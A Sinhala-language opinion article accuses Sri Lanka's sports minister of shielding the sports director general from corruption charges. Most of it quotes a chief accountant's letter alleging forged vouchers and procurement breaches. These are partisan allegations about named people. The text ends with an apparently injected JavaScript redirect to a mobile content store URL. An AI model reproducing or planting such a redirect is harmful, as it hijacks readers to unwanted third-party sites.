ක‍්‍රීඩාව බාල්දු කිරීම

වත්මන් ජන පතිවරයා තව දුරටත් තබා ගැනීමේ සටනට හඬ නගන කිහිපදෙනා අතර මහින්දානන්ද අලූත්ගමගේ ඇමතිවරයා ප‍්‍රමුඛයෙකි. ආණ්ඩුව බේරා ගැනීම වෙනුවෙන් ජනපති රැකගැනීම වෙනුවෙන් අමාත්‍යවරයා නගන හෙඬ් ශබ්දය සුළුපටු නොවේ. මෙතරම් ශක්තියක්, මෙතරම් ශබ්දයක්, මෙතරම් පරිත්‍යාගයක් කුමක් සඳහාද?

ක‍්‍රීඩා අමාත්‍යාංශය යනු මෑතකදී වැඩිපුරම කතාබහට ලක්වූ අමාත්‍යාංශයකි. ඒ වැඩ කිරීම නිසා නොව වැඩ කරන ලෙස පෙනී සිටිමින් වැඩ ඇනූ නිසාය. වත්මන් ක‍්‍රීඩා අමාත්‍යවරයාගේ කාලය යනු මෙරට ක‍්‍රීඩාව නන්නත්තාර වූ වැඩකට නැතිම කාලයය. එය කොයිතරම්ද යත් ඉතිහාසයේ කවරදාක නොවූ ලෙස තම අමාත්‍යාංශයේ ගිණුම් ප‍්‍රධානියාම අමාත්‍යවරයා සහ ක‍්‍රීඩා අධ්‍යක්ෂ ජනරාල්වරියට දූෂණ වංචා චෝදනා එල්ල කරන තැනට පත්වූයේය. අදාළ චෝදනා අල්ලස් හෝ දූෂණ චෝදනා විමර්ශන කොමිෂන් සභාවටද ගියේය. මේ කිසිවක් වගේ වගක් නැති ගාණට ඉන්නට ක‍්‍රීඩා අමාත්‍යවරයාට හැකිවන්නේ කෙසේද? ඒ ජනපති වෙනුවෙන් හඬ නැගීමෙනි. ජනපතිගේ ජයම පැතීමෙනි. එවිට තමාට ගැලවුම හිමිවන බව ක‍්‍රීඩා අමාත්‍යවරයා හොඳාකාරවම දනී. ජනපතිවරයා නාවලපිටියේදී පිළිගන්නා ක‍්‍රීඩා ඇමති එහිදී ජනපති ළඟ තබාගෙන කියනුයේ ජනපති නොවන්නට නාවලපිටියක් නැති බවය. එය ඇත්තක්ද? නාවලපිටිය ජනතාව කෙසේ වෙතත් නාවලපිටිය කෙසේ වෙතත් ජනපති නොවන්නට මහින්දානන්ද අලූත්ගමගේ අමාත්‍යවරයා මෙතරම් කෙරුමකු වී සිටීද යන ගැටලූව ඉතිරි නොවේද?

table-01

ක‍්‍රීඩා අමාත්‍යාංශයේ ගණකාධිකාරීවරයා ක‍්‍රීඩා අධ්‍යක්ෂ ජනරාල්වරියට එරෙහිව නැගූ චෝදනා බරපතළය. එය ක‍්‍රීඩා අධ්‍යක්ෂ ජනරාල්ට පමණක් නොව සෘජුව ක‍්‍රීඩා අමාත්‍යවරයාටද එරෙහිව නැගුණු චෝදනාවකි. මන්ද ඒ සියල්ලට අනුබල ආශිර්වාද දෙනුයේ ක‍්‍රීඩා අමාත්‍යවරයා වන බැවිනි.
මෙහි ඇති අපූරු බව නම් මෙතරම් බරපතළ චෝදනා ගොනුවද්දී අමාත්‍යංශ ලේකම් එම චෝදනා විභාග කරන්නට උත්සාහ කිරීමේදී ඔහු මාරු කොට යැවීමට ක‍්‍රීඩා අමාත්‍යවරයා කටයුතු කිරීමය. ඉන් නොනැවතී චෝදනා එල්ල කළ ප‍්‍රධාන ගණකාධිකාරිවරයාද තම ආයතනයෙන් මාරු කිරීමය. එලෙස මාරු කරනුයේ ඔහුට එරෙහිව චෝදනා පත‍්‍රයක්ද ගොනු කරමිනි. මේ සියල්ල පිටුපස ඉන්නා හඬ කවුද?

ක‍්‍රීඩා අමාත්‍යවරයා නිකමට හෝ රංජනී ජයකොඩි මහත්මියට එරෙහි චෝදනා පිළිබඳ පරීක්ෂණයක් හෝ කරනවායැ’යි නොකිව්වේ ඇයි?
අපි නැවත එම චෝදනා මතක් කරමු. ඒ එය නැවත නැවත මතක් කිරීමට වටිනා බැවිනි.
අපි ක‍්‍රීඩා අමාත්‍යාංශයේ ප‍්‍රධාන ගණකාධිකාරීව සිටි එම්.ඞී.එස්.ඒ. පෙරේරා මහතා උපුටා ගනිමු.
‘මෙම දෙපාර්ත මේන්තුවේ අධ්‍යක්ෂ ජනරාල් ලෙස කටයුතු කරන රංජනී ජයකොඩි මහත්මිය දෙපාර්ත මේන්තුවේ ප‍්‍රධානියකු ලෙස තමාට ලැබී ඇති බලය අත්තනෝමතික ලෙස පරිහරණය කරමින් මුදල් රෙගුලාසි ඇතුළු චක‍්‍රලේඛවලට පටහැනි ලෙස මහජන මුදල් පරිහරණය කරමින් සිටී. එම ක‍්‍රියාවලියේදී ගෙවීම් සහතික කරන නිලධාරියා ලෙස මට දැඩි බලපෑම් එල්ල වී ඇති අතර, විවිධ අවිධිමත් ගනුදෙනුවලට අදාළ වියදම් සහතික කිරීම මා විසින් සිදු නොකරන අවස්ථාවලදී ගරු අමාත්‍යතුමා මගින් මට බලපෑම් කරමින් ගෙවීම් කටයුතු කිරීමට බලකරමින් සිටී.’ (උපුටා ගැනීම අවසන්.)

ඔහු අපහසුතාවට පත්වූ ගනුදෙනු මෙසේය. මේ ගණකාධිකාරීවරයා අල්ලස් කොමිසමට පවා ගිය චෝදනාය. ක‍්‍රීඩා අමාත්‍යවරයා වගේ වගක් නොගන්නා චෝදනාය.
කූඨ ලේඛන පිළියෙළ කොට රුපියල් මිලියන ගණනාවක මුදලක් ක‍්‍රීඩා සංගම්වලට නිකුත් කිරීමට නියෝග කිරීම සහ එම ගෙවීම් නොකිරීම සම්බන්ධව නිදහසට කරුණු විමසීම.
අධ්‍යක්ෂ ජනරාල් විසින් ගරු අමාත්‍යතුමා වෙත යොමු කර ඇති අංක DSD/ NSA/57 හා 2013-11-27 දිනැති ලිපියේ පිටපතක් මේ සමග අමුණා ඇත. (ඇමුණුම 1) ලිපියේ 2 වැනි ෙඡ්දය අනුව අදාළ සංගම් විසින් මිල ගණන් කැඳවා මිලදී ගැනීමට අදාළ ආයතන නිර්දේශ කොට ක‍්‍රීඩා සංවර්ධන දෙපාර්තමේන්තුවට ඉදිරිපත් කොට ඇති බවත් එම මිල ගණන්වලට අනුව එම ආයතනවලට මූල්‍ය ප‍්‍රදානයන් ලබාදීමට අනුමැතිය ලබාදෙන ලෙසත් ඉල්ලා ඇත. ගෙවිය යුතු මුළු මුදල රු. මිලියන 53.8කි. මෙම මුදල ගෙවීම සඳහා අධ්‍යක්ෂ ජනරාල් විසින් වවුචර් අනුමත කොට ගෙවීම් සඳහා මා වෙත ඉදිරිපත් කොට තිබේ. මීට අදාළ ගොනුව පරීක්ෂා කිරීමේදී පහත සඳහන් තොරතුරු හෙළිදරව් විය.
ගොනු අංකය DSD/ NSA/57

වගුව 1 බලන්න

table-02

ඒ අනුව ගරු අමාත්‍යතුමා වෙත ඉදිරිපත් කර ඇති ලිපිය මගින් සඳහන් කර ඇති මුදල් ප‍්‍රතිපාදන සාවද්‍ය වේ. ඒ අනුව පිළියෙළ කළ වවුචර්වලින් ගෙවීමට අනුමත කර ඇති වවුචර් ඇතුළු සියලූ ලිපි ලේඛන කූඨ ලේඛන වේ. මෙම කූඨ ලේඛනවලට අදාළ වියදම් සහතික නොකිරීම නිසා 2014-05-28 දින ඇති අංක DSD/NSA/ Common/53 ලිපිය මගින් හේතු විමසා ඇත. මුළු සාවද්‍ය ගෙවීමට අදාළ මුදල රු. මිලියන 28ක් පමණ වේ.

මුදල් සම්බන්ධව ගණන් දීමේ නිලධාරියකු නොමැති ආයතනවලට මෙලෙස මුදල් වර්ෂය අවසානයේ අත්තිකාරම් ලබාදීමට අධිකාරී බලයක් කිසිවකුට ලබාදී නොමැත. කිසියම් අමාත්‍යාංශයකට හෝ දෙපාර්තමේන්තුවකට වෙන්කරන ප‍්‍රතිපාදන වෙනත් රාජ්‍ය ආයතනයක් වෙත ලබාදීමේදී මුදල් රෙගුලාසි අනුව ප‍්‍රතිපාදන වෙන්කිරීම මිස මෙලෙස භාණ්ඩාගාර අග‍්‍රිමයෙන් අත්තිකාරම් ලබාදිය නොහැක. තත්ත්වය එසේ තිබියදී කූඨ ලේඛන මගින් භාණ්ඩාගාර අග‍්‍රිමය අත්තිකාරම් ලෙස වගකීමක් නොමැති ආයතන වෙත නිකුත් කිරීමට නියෝග දීම සහ එසේ නොකිරීම පිළිබඳව නිදහසට කරුණු විමසීම බරපතළ විෂමාචාරයකි. අදාළ ලිපි ලේඛනවල පිටපත් අමුණා ඇත. මෙලෙස අග‍්‍රිම නිකුත් කිරීම සඳහා ප‍්‍රධාන ගණන් දීමේ නිලධාරි වන ඔබගේ අනුමැතිය හෝ ලබාගෙන නොමැත.

02. වාහන අලූත්වැඩියාව.

(i) ප‍්‍රසම්පාදන මාර්ගෝපදේශ සංග‍්‍රහයට පටහැනි ලෙස වාහන අලූත්වැඩියා කටයුතු සිදුකිරීම.

දෙපාර්තමේන්තුවේ වාහන අලූත්වැඩියා කටයුතු අධ්‍යක්ෂ ජනරාල් විසින් පුද්ගලිකව මෙහෙයවන ව්‍යාපෘතියකි. ප‍්‍රසම්පාදන මාර්ගෝපදේශ සංග‍්‍රහය අනුව වාහන අලූත්වැඩියා කටයුතු සඳහාද ලියාපදිංචි හෝ ටෙලිකොම් නාමාවලියේ සඳහන් ගරාජවලින් මිල ගණන් කැඳවා සුදුසු ආයතනයක් තෝරාගත යුතු වුවත් ඊට පටහැනි ලෙස ‘අරවින්ද මෝටර්ස් ඇන්ඞ් සර්විස්’ නමැති ආයතනයකට වාහන අලූත්වැඩියා කටයුතු පවරා දෙනු ලැබේ. මෙම ආයතනයට අදාළ ලිපිනයන් අනුව එම ස්ථානවල ගරාජයන් දක්නට නොමැත. මිල ගණන් කැඳවූ බව පෙන්වීම සඳහා පංචිකාවත්ත කොළඹ 10 පිහිටි මෝටර් රථ අමතර කොටස් සහ උපාංග සපයන ආයතනයක් වන හිරුණ ඔටෝ ස්පෙයාස් නම් වූ ආයතනයෙන් සහ එම ගොඩනැගිල්ලේම පළමු මහලේ පිහිටි ඇක්මාස් මෝටර්ස් නමැති අමතර කොටස් සපයන ආයතනයෙන්ද මිල ගණන් ලබාගෙන අරවින්ද මෝටර්ස් වෙත අලූත්වැඩියා කටයුතු භාරදී තිබේ.

(ii)වාහන අනතුරු සම්බන්ධයෙන් කටයුතු කිරීම.

දෙපාර්තමේන්තු වාහන අනතුරුවලට ලක්වූ පසු ඊට අදාළ මුදල් රෙගුලාසි අනුව කටයුතු නොකර අනතුරට ලක්වූ වාහනය මෙම ආයතනයට යොමු කොට අලූත්වැඩියා කොට රක්ෂණ වන්දිය කෙළින්ම ගරාජයට ගෙවන ලෙසට රක්ෂණ සමාගම්වලට උපදෙස් දී ඇත. මේ අනුව අනතුරකට ලක්වන වාහන පිළිබඳව මුදල් රෙගුලාසි අනුව නියමිත පියවර මගහැරී යන අතර රජයේ ආදායමට බැරවිය යුතු රක්ෂණ වන්දි රජයට නොලැබීම සහ වාහන අලූත්වැඩියා ප‍්‍රතිපාදන ඉතිරිවීම සිදුවේ. රජයට ලැබිය යුතු මුදල් දෙපාර්තමේන්තු පොත්වලට නොගෙන කෙළින්ම පිටස්තර ආයතනවලට ගෙවීම සඳහා ආයතන ප‍්‍රධානීන්ට බලයක් නොමැත.

(iii) බලය ඉක්මවා කටයුතු කිරීම

ප‍්‍රසම්පාදන මාර්ගෝපදේශ සංග‍්‍රහයේ 9.3 වගන්තිය කෙරෙහි ඔබගේ අවධානය යොමු කරමි. එහි 9.3.1 (බී* යටතේ රුපියල් ලක්ෂ 2ක් ඉක්මවන මෝටර් වාහන අලූත්වැඩියා කටයුතු අමාත්‍යාංශයේ ලේකම්ගේ අනුමැතිය යටතේ සිදුකළ යුතු වුවත් ඊට පටහැනි ලෙස අධ්‍යක්ෂ ජනරාල් විසින් වාහන අලූත්වැඩියා සිදුකර ඇත.
03 ගුවන් ටිකට් පත් මිලදී ගැනීම

දෙපාර්තමේන්තුව සහ ඊට අනුබද්ධ ආයතන සඳහා අවශ්‍ය ගුවන් ටිකට් පත් මිලදී ගැනීමේදී පිළිගත් ක‍්‍රමවේදයෙන් බැහැරව තෝරාගත් ආයතනවලට ගුවන් ටිකට්පත් ඇණවුම් ලබාදීමට කටයුතු කොට ගෙවීමට ඉදිරිපත් කරනු ලැබේ.

2008-04-28 දිනැති අංක 431 දරන රාජ්‍ය මුදල් චක‍්‍රලේඛයේ අංක 3 අනුව යානා බලපත‍්‍ර මිලදී ගතයුතුවන්නේ බී. ඕ.සී. ට‍්‍රැවල්ස් (පුද්* සමාගම සහ පීපල්ස් ට‍්‍රැවල් (පුද්.* සමාගම යන ආයතනවලිනි. මෙම චක‍්‍රලේඛයට පටහැනි ලෙස කටයුතු කරමින් වර්ල්ඞ් එයාර් සහ දනාටා ට‍්‍රැවල්ස් නමැති ආයතනවලට ඇණවුම ලබාදී ටෙන්ඩර් අනුමැතිය හෝ නොමැතිව ගෙවීම් සඳහා වවුචර් ඉදිරිපත් කරනු ලැබේ.

චක‍්‍රලේඛය අනුව වෙනත් ආයතනවලින් මිල ගණන් කැඳවීමට ප‍්‍රතිපාදන සලසා නැත. 2011 වර්ෂයේ අමාත්‍යාංශය විසින් ආයතන කිහිපයක් ලියාපදිංචි කර ඇති නමුත් ඉන්පසුව ලියාපදිංචි කොට නැත. ඉහත ආයතන 2 සමග ඉදිරිපත් කරන මිල ගණන්වලට අදාළ ආයතන 2011 වර්ෂයේදී ලියාපදිංචි කළ සමාගම් ලැයිස්තුවේද නොමැත. මේ ආයතන ඇතුළත් වවුචර්වලට වියදම් සහතික නොකිරීම නිසා බරපතළ ගැටලූ මතුව තිබේ.

04. 2013 ජාතික මහා ක‍්‍රීඩා උළෙල විකාශය කිරීමට අදාළ ගෙවීම.

මිල ගණන් නොමැතිව ටෙන්ඩර් අනුමැතිය ලබා නොගෙන රුපියල් මිලියන 2.4ක් වටිනා වවුචරයක් කාල්ටන් ස්පෝර්ට්ස් නෙට්වර්ක් නමැති ආයතනය නමින් ගෙවීම සඳහා ඉදිරිපත් කොට තිබේ. ගොනු අංකයක් හෝ පිළියෙළ කළ හෝ පරීක්ෂා කළ නිලධාරියකු හෝ නොමැති මෙම වවුචරයට අදාළ වියදම අධ්‍යක්ෂ ජනරාල් විසින් අනුමත කොට ඇති අතර ටෙන්ඩර් බල සීමාව ඉක්මවමින් රු. මිලියන 2.4ක මිල ගණනද අනුමත කොට තිබේ. (ඇමුණුම 2)
05. බලය ඉක්මවා කටයුතු කිරීම

ජනාධිපති ලේකම්ගේ අංක සීඒ/1/17/1 හා 2010 මැයි මස 14 දිනැති රාජ්‍ය වියදම් කළමනාකරණය කිරීම පිළිබඳව චක‍්‍රලේඛයට ඔබගේ අවධානය යොමු කරමි. මෙම චක‍්‍රලේඛය මගින් ගරු අමාත්‍යවරයා/නියෝජ්‍ය අමාත්‍යවරයා සහ පුද්ගලික කාර්ය මණ්ඩලවල වියදම් පිළිබඳව සීමාවන් සඳහන් වේ. එහි 5.7 ෙඡ්දයේ සඳහන් වනුයේ අතිරේක ඉන්ධන බිල්පත් අතිගරු ජනාධිපතිතුමාගේ අනුමැතියට ඉදිරිපත් නොකරනු ලෙසයි.

තත්ත්වය එසේ තිබියදී 2014-02-13 දිනැති අංක එම්එස්/එම් ඕඑස්/ඞීඑස්ඞී/01 දරන ලිපිය මගින් ගරු අමාත්‍යවරයාගේ සම්බන්ධීකරණ ලේකම් විසින් අතිරේක ඉන්ධන දීමනාවක් ලබාදෙන ලෙස අධ්‍යක්ෂ ජනරාල්ගෙන් ඉල්ලා ඇත. ගරු අමාත්‍යවරයාගේ වියදම්වලට අදාළව ප‍්‍රතිපාදන අමාත්‍යාංශය යටතේ වෙන්කර ඇති බැවින් මෙම ඉල්ලීම අමාත්‍යාංශය වෙත යොමු කළ යුතු වුවත් අධ්‍යක්ෂ ජනරාල් ජනාධිපති ලේකම්ගේ බලතලද ඉක්මවා එය අනුමත කොට ගෙවීම් වවුචරයක්ද අනුමත කොට ඉදිරිපත් කර තිබේ. මෙම ගෙවීම මා විසින් සිදු නොකරන ලදි. (ඇමුණුම 3)
ඉහත මා සඳන් කර ඇත්තේ අධ්‍යක්ෂ ජනරාල් විසින් ස්වකීය බලතල අත්තනෝමතික ලෙස පරිහරණය කරමින් මුදල් රෙගුලාසි ඇතුළු අනිකුත් චක‍්‍රලේඛ උල්ලංඝනය කරමින් කටයුතු කර ඊට අදාළ වියදම් සහතික කිරීම සඳහා යොමු කර ඇති අවස්ථා කිහිපයකි. 2014-07-18 දින ගරු අමාත්‍යවරයා විසින් පවත්වනු ලැබූ රැුස්වීමේදී පදනමද එය වේ.

මෙම තත්ත්වය යටතේ මෙවැනි අවිධිමත් ගනුදෙනු සහතික කිරීම සිදුකළ නොහැකි බව දන්වා සිටින අතර මෙම අවිධිමත් ගනුදෙනු පිළිබඳ පරීක්ෂණයක් ආරම්භ කරන ලෙස කාරුණිකව ඉල්ලා සිටිමි. එමෙන්ම මෙම ආයතනය තුළ ගණකාධිකාරීවරුන්ට මුදල් රෙගුලාසි සහ අනෙකුත් චක‍්‍රලේඛ අනුව රාජකාරි ඉටුකිරීමට සුදුසු වාතාවරණයක් සලසා දෙන ලෙසද කාරුණිකව ඉල්ලා සිටිමි.
මෙයට
එම්.ඞී.එස්.ඒ. පෙරේරා
ප‍්‍රධාන ගණකාධිකාරි/
ක‍්‍රීඩා සංවර්ධන දෙපාර්තමේන්තුව.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;